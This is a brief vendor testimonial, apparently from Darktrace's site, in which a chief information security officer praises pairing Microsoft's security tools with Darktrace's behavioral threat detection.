For the organization I work in, combining Microsoft with Darktrace delivered a clear step-change in our security posture. Microsoft provided the foundation, while Darktrace’s behavioral intelligence added visibility into the unknown, surfacing emerging threats based on deviations in real-time activity, not just known indicators.

The result was enterprise-grade protection without added overhead, allowing us to stay focused on patient outcomes, not security operations. For organizations facing similar pressures, this layered approach offers a smarter, more efficient path to securing modern environments.

Continue reading
About the author
Mice Chen
Chief Information Security Officer
Your data. Our AI.
Elevate your network security with Darktrace AI